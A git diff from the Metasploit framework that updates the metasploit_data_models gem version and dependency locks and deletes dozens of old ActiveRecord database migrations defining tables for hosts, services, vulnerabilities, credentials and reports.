.../migrate/20110422000000_convert_binary.rb | 72 -------- ...0110425095900_add_last_seen_to_sessions.rb | 8 - ...0110513143900_track_successful_exploits.rb | 31 ---- ...517160800_rename_and_prune_nessus_vulns.rb | 26 --- ...0527000000_add_task_id_to_reports_table.rb | 11 -- .../20110527000001_add_api_keys_table.rb | 12 -- .../20110606000001_add_macros_table.rb | 16 -- ...00_move_old_imported_creds_to_new_files.rb | 127 --------------- ...10622000000_add_settings_to_tasks_table.rb | 12 -- .../20110624000001_add_listeners_table.rb | 19 --- ...0625000001_add_macro_to_listeners_table.rb | 12 -- ...110630000001_add_nexpose_consoles_table.rb | 21 --- 
...0002_add_name_to_nexpose_consoles_table.rb | 12 -- .../20110717000001_add_profiles_table.rb | 15 -- ...20110727163801_expand_cred_ptype_column.rb | 9 - .../20110730000001_add_initial_indexes.rb | 85 ---------- .../migrate/20110812000001_prune_indexes.rb | 23 --- .../migrate/20110922000000_expand_notes.rb | 9 - .../20110928101300_add_mod_ref_table.rb | 17 -- ...10000_add_display_name_to_reports_table.rb | 24 --- .../migrate/20111203000000_inet_columns.rb | 13 -- .../20111204000000_more_inet_columns.rb | 17 -- .../20111210000000_add_scope_to_hosts.rb | 9 - ...0120126110000_add_virtual_host_to_hosts.rb | 9 - ...20120411173220_rename_workspace_members.rb | 9 - ...20601152442_add_counter_caches_to_hosts.rb | 21 --- .../20120625000000_add_vuln_details.rb | 34 ---- .../20120625000001_add_host_details.rb | 16 -- .../migrate/20120625000002_expand_details.rb | 16 -- .../migrate/20120625000003_expand_details2.rb | 24 --- .../20120625000004_add_vuln_attempts.rb | 19 --- ...000005_add_vuln_and_host_counter_caches.rb | 14 -- .../20120625000006_add_module_details.rb | 118 -------------- .../20120625000007_add_exploit_attempts.rb | 26 --- .../20120625000008_add_fail_message.rb | 12 -- ...2805_add_owner_and_payload_to_web_vulns.rb | 13 -- lib/msf/core/db_manager.rb | 6 +- 88 files changed, 13 insertions(+), 2219 deletions(-) delete mode 100755 data/sql/migrate/000_create_tables.rb delete mode 100755 data/sql/migrate/001_add_wmap_tables.rb delete mode 100755 data/sql/migrate/002_add_workspaces.rb delete mode 100755 data/sql/migrate/003_move_notes.rb delete mode 100755 data/sql/migrate/004_add_events_table.rb delete mode 100755 data/sql/migrate/005_expand_info.rb delete mode 100755 data/sql/migrate/006_add_timestamps.rb delete mode 100755 data/sql/migrate/007_add_loots.rb delete mode 100755 data/sql/migrate/008_create_users.rb delete mode 100755 data/sql/migrate/009_add_loots_ctype.rb delete mode 100755 data/sql/migrate/010_add_alert_fields.rb delete mode 100755 
data/sql/migrate/011_add_reports.rb delete mode 100755 data/sql/migrate/012_add_tasks.rb delete mode 100755 data/sql/migrate/013_add_tasks_result.rb delete mode 100755 data/sql/migrate/014_add_loots_fields.rb delete mode 100755 data/sql/migrate/015_rename_user.rb delete mode 100755 data/sql/migrate/016_add_host_purpose.rb delete mode 100755 data/sql/migrate/017_expand_info2.rb delete mode 100755 data/sql/migrate/018_add_workspace_user_info.rb delete mode 100755 data/sql/migrate/019_add_workspace_desc.rb delete mode 100755 data/sql/migrate/020_add_user_preferences.rb delete mode 100755 data/sql/migrate/021_standardize_info_and_data.rb delete mode 100755 data/sql/migrate/022_enlarge_event_info.rb delete mode 100755 data/sql/migrate/023_add_report_downloaded_at.rb delete mode 100755 data/sql/migrate/024_convert_service_info_to_text.rb delete mode 100755 data/sql/migrate/025_add_user_admin.rb delete mode 100755 data/sql/migrate/026_add_creds_table.rb delete mode 100755 data/sql/migrate/20100819123300_migrate_cred_data.rb delete mode 100755 data/sql/migrate/20100824151500_add_exploited_table.rb delete mode 100755 data/sql/migrate/20100908001428_add_owner_to_workspaces.rb delete mode 100755 data/sql/migrate/20100911122000_add_report_templates.rb delete mode 100755 data/sql/migrate/20100916151530_require_admin_flag.rb delete mode 100755 data/sql/migrate/20100916175000_add_campaigns_and_templates.rb delete mode 100755 data/sql/migrate/20100920012100_add_generate_exe_column.rb delete mode 100755 data/sql/migrate/20100926214000_add_template_prefs.rb delete mode 100755 data/sql/migrate/20101001000000_add_web_tables.rb delete mode 100755 data/sql/migrate/20101002000000_add_query.rb delete mode 100755 data/sql/migrate/20101007000000_add_vuln_info.rb delete mode 100755 data/sql/migrate/20101008111800_add_clients_to_campaigns.rb delete mode 100755 data/sql/migrate/20101009023300_add_campaign_attachments.rb delete mode 100755 data/sql/migrate/20101104135100_add_imported_creds.rb 
delete mode 100755 data/sql/migrate/20101203000000_fix_web_tables.rb delete mode 100755 data/sql/migrate/20101203000001_expand_host_comment.rb delete mode 100755 data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb delete mode 100755 data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb delete mode 100755 data/sql/migrate/20110204112800_add_host_tags.rb delete mode 100755 data/sql/migrate/20110317144932_add_session_table.rb delete mode 100755 data/sql/migrate/20110414180600_add_local_id_to_session_table.rb delete mode 100755 data/sql/migrate/20110415175705_add_routes_table.rb delete mode 100755 data/sql/migrate/20110422000000_convert_binary.rb delete mode 100755 data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb delete mode 100755 data/sql/migrate/20110513143900_track_successful_exploits.rb delete mode 100755 data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb delete mode 100755 data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb delete mode 100755 data/sql/migrate/20110527000001_add_api_keys_table.rb delete mode 100755 data/sql/migrate/20110606000001_add_macros_table.rb delete mode 100755 data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb delete mode 100755 data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb delete mode 100755 data/sql/migrate/20110624000001_add_listeners_table.rb delete mode 100755 data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb delete mode 100755 data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110717000001_add_profiles_table.rb delete mode 100755 data/sql/migrate/20110727163801_expand_cred_ptype_column.rb delete mode 100755 data/sql/migrate/20110730000001_add_initial_indexes.rb delete mode 100755 data/sql/migrate/20110812000001_prune_indexes.rb delete mode 100755 
data/sql/migrate/20110922000000_expand_notes.rb delete mode 100755 data/sql/migrate/20110928101300_add_mod_ref_table.rb delete mode 100755 data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb delete mode 100755 data/sql/migrate/20111203000000_inet_columns.rb delete mode 100755 data/sql/migrate/20111204000000_more_inet_columns.rb delete mode 100755 data/sql/migrate/20111210000000_add_scope_to_hosts.rb delete mode 100755 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb delete mode 100755 data/sql/migrate/20120411173220_rename_workspace_members.rb delete mode 100755 data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb delete mode 100755 data/sql/migrate/20120625000000_add_vuln_details.rb delete mode 100755 data/sql/migrate/20120625000001_add_host_details.rb delete mode 100755 data/sql/migrate/20120625000002_expand_details.rb delete mode 100755 data/sql/migrate/20120625000003_expand_details2.rb delete mode 100755 data/sql/migrate/20120625000004_add_vuln_attempts.rb delete mode 100755 data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb delete mode 100755 data/sql/migrate/20120625000006_add_module_details.rb delete mode 100755 data/sql/migrate/20120625000007_add_exploit_attempts.rb delete mode 100755 data/sql/migrate/20120625000008_add_fail_message.rb delete mode 100644 data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb diff --git a/Gemfile b/Gemfile index 3d5f14fe4c..9513b0a497 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.5.1' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler 
diff --git a/Gemfile.lock b/Gemfile.lock index c50df873bf..6ac57f60f6 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 448c1065329efea1eac76a3897f626f122666743 - tag: 0.4.0 + revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + tag: 0.5.1 specs: - metasploit_data_models (0.4.0) + metasploit_data_models (0.5.1) activerecord (>= 3.2.10) activesupport pg @@ -25,7 +25,7 @@ GEM multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) - coderay (1.0.8) + coderay (1.0.9) diff-lcs (1.1.3) i18n (0.6.1) json (1.7.7) @@ -35,10 +35,10 @@ GEM nokogiri (1.5.6) pcaprub (0.11.3) pg (0.14.1) - pry (0.9.10) + pry (0.9.12) coderay (~> 1.0.5) method_source (~> 0.8) - slop (~> 3.3.1) + slop (~> 3.4) rake (10.0.2) redcarpet (2.2.2) robots (0.10.1) @@ -54,7 +54,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) - slop (3.3.3) + slop (3.4.3) tzinfo (0.3.35) yard (0.8.3) diff --git a/data/sql/migrate/000_create_tables.rb b/data/sql/migrate/000_create_tables.rb deleted file mode 100755 index efda742476..0000000000 --- a/data/sql/migrate/000_create_tables.rb +++ /dev/null 
@@ -1,79 +0,0 @@ -class CreateTables < ActiveRecord::Migration - - def self.up - - create_table :hosts do |t| - t.timestamp :created - t.string :address, :limit => 16 # unique - t.string :address6 - t.string :mac - t.string :comm - t.string :name - t.string :state - t.string :info, :limit => 1024 - t.string :os_name - t.string :os_flavor - t.string :os_sp - t.string :os_lang - t.string :arch - end - - add_index :hosts, :address, :unique => true - - create_table :clients do |t| - t.integer :host_id - t.timestamp :created - t.string :ua_string, :limit => 1024, :null => false - t.string :ua_name, :limit => 64 - t.string :ua_ver, :limit => 32 - end - - create_table :services do |t| - t.integer :host_id - t.timestamp :created - t.integer :port, :null => false - t.string :proto, :limit => 16, :null => false - t.string :state - t.string :name - t.string :info, :limit => 1024 - end - - create_table :vulns do |t| - t.integer :host_id - t.integer :service_id - t.timestamp :created - t.string :name - t.text :data - end - - create_table :refs do |t| - t.integer :ref_id - t.timestamp :created - t.string :name, :limit => 512 - end - - create_table :vulns_refs, :id => false do |t| - t.integer :ref_id - t.integer :vuln_id - end - - create_table :notes do |t| - t.integer :host_id - t.timestamp :created - t.string :ntype, :limit => 512 - t.text :data - end - - end - - def self.down - drop_table :hosts - drop_table :clients - drop_table :services - drop_table :vulns - drop_table :refs - drop_table :vulns_refs - drop_table :notes - end - -end diff --git a/data/sql/migrate/001_add_wmap_tables.rb b/data/sql/migrate/001_add_wmap_tables.rb deleted file mode 100755 index e0d37098c2..0000000000 --- a/data/sql/migrate/001_add_wmap_tables.rb +++ /dev/null 
@@ -1,35 +0,0 @@ -class AddWmapTables < ActiveRecord::Migration - def self.up - create_table :wmap_targets do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.integer :selected - end - - create_table :wmap_requests do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.string :meth, :limit => 32 - t.text :path - t.text :headers - t.text :query - t.text :body - t.string :respcode, :limit => 16 - t.text :resphead - t.text :response - t.timestamp :created - end - end - - def self.down - drop_table :wmap_targets - drop_table :wmap_requests - end -end - diff --git a/data/sql/migrate/002_add_workspaces.rb b/data/sql/migrate/002_add_workspaces.rb deleted file mode 100755 index 9afe792ef5..0000000000 --- a/data/sql/migrate/002_add_workspaces.rb +++ /dev/null @@ -1,36 +0,0 @@ -class AddWorkspaces < ActiveRecord::Migration - - def self.up - create_table :workspaces do |t| - t.string :name - t.timestamps - end - - change_table :hosts do |t| - t.integer :workspace_id, :required => true - end - - remove_index :hosts, :column => :address - - # - # This was broken after 018_add_workspace_user_info was introduced - # because of the new boundary column. For some reason, the - # find_or_create_by_name that .default eventually calls here tries to - # create a record with the boundary field that doesn't exist yet. - # See #1724 - # - #w = Msf::DBManager::Workspace.default - #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id] - end - - def self.down - drop_table :workspaces - - change_table :hosts do |t| - t.remove :workspace_id - end - - add_index :hosts, :address, :unique => true - end - -end diff --git a/data/sql/migrate/003_move_notes.rb b/data/sql/migrate/003_move_notes.rb deleted file mode 100755 index 3aedba8e20..0000000000 --- a/data/sql/migrate/003_move_notes.rb +++ /dev/null 
@@ -1,20 +0,0 @@ -class MoveNotes < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :notes, :host_id - change_table :notes do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :service_id - t.integer :host_id - end - end - - def self.down - remove_column :notes, :workspace_id - remove_column :notes, :service_id - change_table :notes do |t| - t.integer :host_id, :null => false - end - end -end - diff --git a/data/sql/migrate/004_add_events_table.rb b/data/sql/migrate/004_add_events_table.rb deleted file mode 100755 index a89d75281e..0000000000 --- a/data/sql/migrate/004_add_events_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddEventsTable < ActiveRecord::Migration - def self.up - create_table :events do |t| - t.integer :workspace_id - t.integer :host_id - t.timestamp :created_at - t.string :user - t.string :name - t.string :info - end - end - def self.down - drop_table :events - end -end - diff --git a/data/sql/migrate/005_expand_info.rb b/data/sql/migrate/005_expand_info.rb deleted file mode 100755 index bd34021e11..0000000000 --- a/data/sql/migrate/005_expand_info.rb +++ /dev/null 
@@ -1,58 +0,0 @@ -class ExpandInfo < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 4096 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 1024 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 1024 - end - - remove_column :vulns, :data - change_table :hosts do |t| - t.string :data, :limit => 1024 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 1024 - end - - end -end - diff --git a/data/sql/migrate/006_add_timestamps.rb b/data/sql/migrate/006_add_timestamps.rb deleted file mode 100755 index 446a83aa29..0000000000 --- a/data/sql/migrate/006_add_timestamps.rb +++ /dev/null 
@@ -1,26 +0,0 @@ - -# Adds 'created_at' and 'updated_at' columns to every primary table. -# -class AddTimestamps < ActiveRecord::Migration - - @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests] - @@TABLES_NEEDING_CREATED_AT = [:wmap_targets] - @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets] - - def self.up - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at } - - @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime } - end - - def self.down - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created } - - @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at } - end -end - diff --git a/data/sql/migrate/007_add_loots.rb b/data/sql/migrate/007_add_loots.rb deleted file mode 100755 index 32786f8cfb..0000000000 --- a/data/sql/migrate/007_add_loots.rb +++ /dev/null @@ -1,20 +0,0 @@ -class AddLoots < ActiveRecord::Migration - - def self.up - create_table :loots do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :host_id - t.integer :service_id - t.string :ltype, :limit => 512 - t.string :path, :limit => 1024 - t.text :data - t.timestamps - end - end - - def self.down - drop_table :loots - end - -end - diff --git a/data/sql/migrate/008_create_users.rb b/data/sql/migrate/008_create_users.rb deleted file mode 100755 index 4cc32cc6e4..0000000000 --- a/data/sql/migrate/008_create_users.rb +++ /dev/null @@ -1,16 +0,0 @@ -class CreateUsers < ActiveRecord::Migration - def self.up - create_table :users do |t| - t.string :username - t.string :crypted_password - t.string :password_salt - t.string :persistence_token - - t.timestamps - end - end - - def self.down - drop_table :users - end -end 
diff --git a/data/sql/migrate/009_add_loots_ctype.rb b/data/sql/migrate/009_add_loots_ctype.rb deleted file mode 100755 index 0aad1366fb..0000000000 --- a/data/sql/migrate/009_add_loots_ctype.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddLootsCtype < ActiveRecord::Migration - def self.up - add_column :loots, :content_type, :string - end - - def self.down - remove_column :loots, :content_type - end -end - diff --git a/data/sql/migrate/010_add_alert_fields.rb b/data/sql/migrate/010_add_alert_fields.rb deleted file mode 100755 index f99dd68d32..0000000000 --- a/data/sql/migrate/010_add_alert_fields.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddAlertFields < ActiveRecord::Migration - def self.up - add_column :notes, :critical, :boolean - add_column :notes, :seen, :boolean - add_column :events, :critical, :boolean - add_column :events, :seen, :boolean - end - - def self.down - remove_column :notes, :critical - remove_column :notes, :seen - remove_column :events, :critical - remove_column :events, :seen - end -end - diff --git a/data/sql/migrate/011_add_reports.rb b/data/sql/migrate/011_add_reports.rb deleted file mode 100755 index 2f16e8b70d..0000000000 --- a/data/sql/migrate/011_add_reports.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddReports < ActiveRecord::Migration - - def self.up - create_table :reports do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :rtype - t.string :path, :limit => 1024 - t.text :options - t.timestamps - end - end - - def self.down - drop_table :reports - end - -end - diff --git a/data/sql/migrate/012_add_tasks.rb b/data/sql/migrate/012_add_tasks.rb deleted file mode 100755 index 39004c821e..0000000000 --- a/data/sql/migrate/012_add_tasks.rb +++ /dev/null 
@@ -1,24 +0,0 @@ -class AddTasks < ActiveRecord::Migration - - def self.up - create_table :tasks do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :module - t.datetime :completed_at - t.string :path, :limit => 1024 - t.string :info - t.string :description - t.integer :progress - t.text :options - t.text :error - t.timestamps - end - end - - def self.down - drop_table :tasks - end - -end - diff --git a/data/sql/migrate/013_add_tasks_result.rb b/data/sql/migrate/013_add_tasks_result.rb deleted file mode 100755 index bf01c7afb8..0000000000 --- a/data/sql/migrate/013_add_tasks_result.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddTasksResult < ActiveRecord::Migration - def self.up - add_column :tasks, :result, :text - end - - def self.down - remove_column :tasks, :result - end -end - diff --git a/data/sql/migrate/014_add_loots_fields.rb b/data/sql/migrate/014_add_loots_fields.rb deleted file mode 100755 index 616d8c96be..0000000000 --- a/data/sql/migrate/014_add_loots_fields.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddLootsFields < ActiveRecord::Migration - def self.up - add_column :loots, :name, :text - add_column :loots, :info, :text - end - - def self.down - remove_column :loots, :name - remove_column :loots, :info - end -end - diff --git a/data/sql/migrate/015_rename_user.rb b/data/sql/migrate/015_rename_user.rb deleted file mode 100755 index 7934a0f423..0000000000 --- a/data/sql/migrate/015_rename_user.rb +++ /dev/null @@ -1,16 +0,0 @@ -class RenameUser < ActiveRecord::Migration - def self.up - remove_column :events, :user - change_table :events do |t| - t.string :username - end - end - - def self.down - remove_column :events, :username - change_table :events do |t| - t.string :user - end - end -end - diff --git a/data/sql/migrate/016_add_host_purpose.rb b/data/sql/migrate/016_add_host_purpose.rb deleted file mode 100755 index 1e2827801e..0000000000 --- a/data/sql/migrate/016_add_host_purpose.rb +++ /dev/null 
@@ -1,10 +0,0 @@ -class AddHostPurpose < ActiveRecord::Migration - def self.up - add_column :hosts, :purpose, :text - end - - def self.down - remove_column :hosts, :purpose - end -end - diff --git a/data/sql/migrate/017_expand_info2.rb b/data/sql/migrate/017_expand_info2.rb deleted file mode 100755 index cee6fd8d3b..0000000000 --- a/data/sql/migrate/017_expand_info2.rb +++ /dev/null @@ -1,58 +0,0 @@ -class ExpandInfo2 < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 65536 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 65536 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 65536 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 65536 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - - end -end - diff --git a/data/sql/migrate/018_add_workspace_user_info.rb b/data/sql/migrate/018_add_workspace_user_info.rb deleted file mode 100755 index fb5e101fc3..0000000000 --- a/data/sql/migrate/018_add_workspace_user_info.rb +++ /dev/null 
@@ -1,29 +0,0 @@ -class AddWorkspaceUserInfo < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :boundary, :limit => 4096 - end - - change_table :users do |t| - t.string :fullname - t.string :email - t.string :phone - t.string :company - end - end - - def self.down - change_table :workspaces do |t| - t.remove :boundary - end - - change_table :users do |t| - t.remove :fullname - t.remove :email - t.remove :phone - t.remove :company - end - end - -end - diff --git a/data/sql/migrate/019_add_workspace_desc.rb b/data/sql/migrate/019_add_workspace_desc.rb deleted file mode 100755 index 0dc31f0c61..0000000000 --- a/data/sql/migrate/019_add_workspace_desc.rb +++ /dev/null @@ -1,23 +0,0 @@ -class AddWorkspaceDesc < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :description, :limit => 4096 - end - - change_table :hosts do |t| - t.string :comments, :limit => 4096 - end - end - - def self.down - change_table :workspaces do |t| - t.remove :description - end - - change_table :hosts do |t| - t.remove :comments - end - end - -end - diff --git a/data/sql/migrate/020_add_user_preferences.rb b/data/sql/migrate/020_add_user_preferences.rb deleted file mode 100755 index 40b472701c..0000000000 --- a/data/sql/migrate/020_add_user_preferences.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddUserPreferences < ActiveRecord::Migration - def self.up - add_column :users, :prefs, :string, :limit => 524288 - end - - def self.down - remove_column :users, :prefs - end - -end - diff --git a/data/sql/migrate/021_standardize_info_and_data.rb b/data/sql/migrate/021_standardize_info_and_data.rb deleted file mode 100755 index bb9a2bccd6..0000000000 --- a/data/sql/migrate/021_standardize_info_and_data.rb +++ /dev/null 
@@ -1,18 +0,0 @@ -class StandardizeInfoAndData < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :vulns, :data - change_table :vulns do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - remove_column :vulns, :info - change_table :notes do |t| - t.string :data, :limit => 65536 - - end - end -end - diff --git a/data/sql/migrate/022_enlarge_event_info.rb b/data/sql/migrate/022_enlarge_event_info.rb deleted file mode 100755 index fec9698c06..0000000000 --- a/data/sql/migrate/022_enlarge_event_info.rb +++ /dev/null @@ -1,10 +0,0 @@ -class EnlargeEventInfo < ActiveRecord::Migration - def self.up - change_column :events, :info, :text - end - - def self.down - change_column :events, :info, :string, :limit => 65535 - end -end - diff --git a/data/sql/migrate/023_add_report_downloaded_at.rb b/data/sql/migrate/023_add_report_downloaded_at.rb deleted file mode 100755 index 7ec5716e82..0000000000 --- a/data/sql/migrate/023_add_report_downloaded_at.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddReportDownloadedAt < ActiveRecord::Migration - def self.up - add_column :reports, :downloaded_at, :timestamp - end - - def self.down - remove_column :reports, :downloaded_at - end -end - diff --git a/data/sql/migrate/024_convert_service_info_to_text.rb b/data/sql/migrate/024_convert_service_info_to_text.rb deleted file mode 100755 index 14f0a96222..0000000000 --- a/data/sql/migrate/024_convert_service_info_to_text.rb +++ /dev/null @@ -1,12 +0,0 @@ -class ConvertServiceInfoToText < ActiveRecord::Migration - - def self.up - change_column :services, :info, :text - end - - def self.down - change_column :services, :info, :string, :limit => 65536 - end - -end - diff --git a/data/sql/migrate/025_add_user_admin.rb b/data/sql/migrate/025_add_user_admin.rb deleted file mode 100755 index d077dbd633..0000000000 --- a/data/sql/migrate/025_add_user_admin.rb +++ /dev/null 
@@ -1,19 +0,0 @@
-class AddUserAdmin < ActiveRecord::Migration
-
- # Add user admin flag and project member list.
- def self.up
- add_column :users, :admin, :boolean, :default => true
-
- create_table :project_members, :id => false do |t|
- t.integer :workspace_id, :null => false
- t.integer :user_id, :null => false
- end
- end
-
- def self.down
- remove_column :users, :admin
-
- drop_table :project_members
- end
-end
-
diff --git a/data/sql/migrate/026_add_creds_table.rb b/data/sql/migrate/026_add_creds_table.rb
deleted file mode 100755
index 381ec8373a..0000000000
--- a/data/sql/migrate/026_add_creds_table.rb
+++ /dev/null
@@ -1,19 +0,0 @@
-class AddCredsTable < ActiveRecord::Migration
- def self.up
- create_table :creds do |t|
- t.integer :service_id, :null => false
- t.timestamps
- t.string :user, :limit => 2048
- t.string :pass, :limit => 4096
- t.boolean :active, :default => true
- t.string :proof, :limit => 4096
- t.string :ptype, :limit => 16
- t.integer :source_id
- t.string :source_type
- end
- end
- def self.down
- drop_table :creds
- end
-end
-
diff --git a/data/sql/migrate/20100819123300_migrate_cred_data.rb b/data/sql/migrate/20100819123300_migrate_cred_data.rb
deleted file mode 100755
index d752c270f4..0000000000
--- a/data/sql/migrate/20100819123300_migrate_cred_data.rb
+++ /dev/null
@@ -1,154 +0,0 @@
-class MigrateCredData < ActiveRecord::Migration
-
- def self.up
- begin # Wrap the whole thing in a giant rescue.
- skipped_notes = []
- new_creds = []
- Mdm::Note.find(:all).each do |note|
- next unless note.ntype[/^auth\.(.*)/]
- service_name = $1
- if !service_name
- skipped_notes << note
- next
- end
- if note.host and note.host.respond_to?(:address)
- if note.service
- svc_id = note.service.id
- else
- candidate_services = []
- note.host.services.each do |service|
- if service.name == service_name
- candidate_services << service
- end
- end
- # Use the default port, or the first port that matches the protocol name.
- default_port = case service_name.downcase
- when 'ftp'; 21
- when /^smb/; 445
- when /^imap/; 143
- when 'telnet'; 23
- when 'pop3'; 110
- when 'http','domino','axis','wordpress','tomcat'; 80
- when 'tns'; 1521
- when 'snmp'; 161
- when 'mssql'; 1433
- when 'ssh'; 22
- when 'https'; 443
- when 'mysql'; 3306
- when 'db2'; 50000
- when 'postgres'; 5432
- else nil
- end
- if !default_port
- skipped_notes << note
- next
- end
- if candidate_services.size == 1
- svc_id = candidate_services.first.id
- elsif candidate_services.empty?
- Mdm::Service.new do |svc|
- svc.host_id = note.host.id
- svc.port = default_port
- svc.proto = 'tcp'
- svc.state = 'open'
- svc.name = service_name.downcase
- svc.save!
- svc_id = svc.id
- end
- elsif candidate_services.size > 1
- svc_ports = candidate_services.map{|s| s.port}
- if svc_ports.index(default_port)
- svc_id = candidate_services[svc_ports.index(default_port)].id
- else
- svc_id = candidate_services.first.id
- end
- end
- end
- else
- skipped_notes << note
- next
- end
- if note.data[:hash]
- ptype = 'smb_hash'
- pass = note.data[:hash]
- elsif note.data[:ssh_key]
- ptype = 'ssh_key'
- pass = note.data[:extra]
- else
- ptype = 'password'
- pass = note.data[:pass]
- end
- # Format domains and databases into the usernames.
- if note.ntype == "auth.smb_challenge"
- domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1]
- if domain
- user = [domain, note.data[:user]].join("/")
- else
- user = note.data[:user]
- end
- elsif note.ntype =~ /auth\.(postgres|db2)/
- if note.data[:database]
- user = [note.data[:database], note.data[:user]].join("/")
- else
- user = note.data[:user]
- end
- else
- user = note.data[:user]
- end
- # Not actually a credentials, convert to migrated notes
- if service_name == 'smb' && note.data[:token]
- skipped_notes << note
- next
- end
- if service_name == 'tns' && note.data[:type] == "bruteforced_sid"
- skipped_notes << note
- next
- end
- # Special case for the bizarre reporting for aux/admin/oracle/oracle_login
- if service_name == 'tns' && note.data[:type] == "bruteforced_account"
- note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/
- user = "#{$3}/#{$1}"
- pass = $2
- end
- new_creds << [svc_id, ptype, user, pass]
- end
-
- say "Migrating #{new_creds.size} credentials."
- new_creds.uniq.each do |note|
- Mdm::Cred.new do |cred|
- cred.service_id = note[0]
- cred.user = note[2]
- cred.pass = note[3]
- cred.ptype = note[1]
- cred.save!
- end
- end
-
- say "Migrating #{skipped_notes.size} notes."
- skipped_notes.uniq.each do |note|
- Mdm::Note.new do |new_note|
- new_note.host_id = note.host_id
- new_note.ntype = "migrated_auth"
- new_note.data = note.data.merge(:migrated_auth_type => note.ntype)
- new_note.save!
- end
- end
-
- say "Deleting migrated auth notes."
- Mdm::Note.find(:all).each do |note|
- next unless note.ntype[/^auth\.(.*)/]
- note.delete
- end
- rescue
- say "There was a problem migrating auth credentials. Skipping."
- return true # Never fail!
- end
- end
-
-
- def self.down
- raise ActiveRecord::IrreversibleMigration
- end
-
-end
-
diff --git a/data/sql/migrate/20100824151500_add_exploited_table.rb b/data/sql/migrate/20100824151500_add_exploited_table.rb
deleted file mode 100755
index b7897d3832..0000000000
